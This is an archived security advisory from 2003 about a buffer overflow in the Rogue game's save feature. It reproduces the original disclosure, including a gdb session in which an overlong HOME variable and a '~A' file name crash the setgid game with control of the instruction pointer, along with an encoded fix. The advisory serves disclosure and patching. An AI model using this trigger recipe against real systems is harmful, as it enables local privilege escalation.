SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Rogue Vendors:   Stoehr, Tim et al
Rogue Game Software Buffer Overflow Lets Local Users Obtain Elevated Privileges
SecurityTracker Alert ID:  1006152
SecurityTracker URL:  http://securitytracker.com/id/1006152
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  

Description:   A buffer overflow vulnerability was reported in the Rogue game software. A local user may be able to obtain additional privileges.

It is reported that the 'save game' feature contains a buffer overflow in the save_into_file() function in the 'save.c' file. A local user can reportedly set a specially crafted HOME environment variable and specify a file name that begins with a tilde ('~') when saving a game. Rogue will replace the tilde with the contents of the HOME environment variable without checking the length of the contents, according to the report.

A local user can overflow the buffer by filling the HOME environment variable with 111 characters and then saving a game with a file name that is two characters long (a tilde plus one additional character). Arbitrary code can be executed. Because the game is typically installed with set group id (setgid) 'games' group privileges, the local user can reportedly obtain 'games' group privileges.

Impact:   A local user can execute arbitrary code with 'games' group privileges.
Solution:   No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message [the patch is Base64 encoded].
Vendor URL:  ibiblio.org/pub/Linux/games/dungeon/!INDEX.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Rogue buffer overflow


---293465837-1442508392-1045861660=:12401
Content-Type: TEXT/PLAIN; charset=US-ASCII

Rogue buffer overflow


PROGRAM: Rogue
VENDOR: Tim Stoehr et al.
DOWNLOAD URL: http://ibiblio.org/pub/Linux/games/dungeon/!INDEX.html
              (any file called "*rogue*" in that directory)
DMOZ/ODP: http://dmoz.org/Games/Video_Games/Roleplaying/Rogue-like/


DESCRIPTION:

Rogue is a text-based role-playing computer game with a long
history. It is the first of the rogue-like games.


SUMMARY:

Rogue's save game function (capital S) suffers from a buffer
overflow. The program is usually installed setgid games, so
successful exploitation means getting that group's access rights.


TECHNICAL DETAILS:

If you specify a file name for saving beginning with a tilde
(~), Rogue will replace that character with the contents of
the environment variable HOME. This happens in the function
save_into_file() in save.c. The concatenation of that environment
variable with the rest of the file name takes place in a buffer of
80 characters, and the code doesn't check if it is overrun or not.

We can exploit this by giving the HOME environment variable a value
that is 111 characters long, and by saving a game with a file name
that is two characters long: a tilde (~) and one more character. That
second character in the file name will be the highest byte in the
address that the processor jumps to. The other bytes in the address
come from the HOME environment variable.

Here is a session capture that illustrates this problem:

$ export HOME=`perl -e 'print "U" x 111;'`
$ gdb rogue
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/vsu/secwork/rogue/rogue

[rogue session snipped]

file name? ~A
~A-more-
problem accessing the save file
Program received signal SIGSEGV, Segmentation fault.
0x41555555 in ?? ()
(gdb) bt
#0  0x41555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax            0x1f     31
ecx            0x656c69 6646889
edx            0xff646b68       -10196120
ebx            0x4213030c       1108542220
esp            0xbfffdd90       0xbfffdd90
ebp            0x55555555       0x55555555
esi            0x40013020       1073819680
edi            0xbfffde84       -1073750396
eip            0x41555555       0x41555555
eflags         0x10286  66182


COMMUNICATION WITH VENDOR:

The program seems to be unmaintained, so I wrote an unofficial
patch instead.


MY PATCH:

I have attached a patch that corrects this problem. I have patched
against rogue985.


// Ulf Harnhammar
   VSU Security
   will audit PHP and Perl code for money
   ulfh@update.uu.se


---293465837-1442508392-1045861660=:12401
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rogue.patch"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0302212207400.12401@Tempo.Update.UU.SE>
Content-Description: 
Content-Disposition: attachment; filename="rogue.patch"

LS0tIHNhdmUuYy5vbGQJV2VkIEZlYiAxOSAwMjozNjo0OCAyMDAzDQorKysg
c2F2ZS5jCVdlZCBGZWIgMTkgMDI6NDc6MzMgMjAwMw0KQEAgLTY3LDggKzY3
LDEwIEBADQogDQogCWlmIChzZmlsZVswXSA9PSAnficpIHsNCiAJCWlmICho
cHRyID0gbWRfZ2V0ZW52KCJIT01FIikpIHsNCi0JCQkodm9pZCkgc3RyY3B5
KG5hbWVfYnVmZmVyLCBocHRyKTsNCi0JCQkodm9pZCkgc3RyY2F0KG5hbWVf
YnVmZmVyLCBzZmlsZSsxKTsNCisJCQkvKiBTZWN1cml0eSBmaXgsIFVsZiBI
YXJuaGFtbWFyIDIwMDMgKi8NCisJCQkodm9pZCkgc3RybmNweShuYW1lX2J1
ZmZlciwgaHB0ciwgc2l6ZW9mKG5hbWVfYnVmZmVyKSk7DQorCQkJKHZvaWQp
IHN0cm5jYXQobmFtZV9idWZmZXIsIHNmaWxlKzEsIHNpemVvZihuYW1lX2J1
ZmZlcikgLSBzdHJsZW4oaHB0cikpOw0KKwkJCW5hbWVfYnVmZmVyW3NpemVv
ZihuYW1lX2J1ZmZlcikgLSAxXSA9ICdcMCc7DQogCQkJc2ZpbGUgPSBuYW1l
X2J1ZmZlcjsNCiAJCX0NCiAJfQ0K
---293465837-1442508392-1045861660=:12401--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC